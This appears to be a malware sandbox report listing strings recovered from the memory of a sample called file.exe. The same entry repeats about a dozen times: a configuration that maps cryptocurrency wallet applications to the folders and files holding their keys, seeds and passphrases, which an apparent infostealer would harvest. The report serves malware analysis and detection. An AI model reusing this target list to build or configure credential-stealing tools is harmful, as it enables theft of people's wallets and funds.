Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
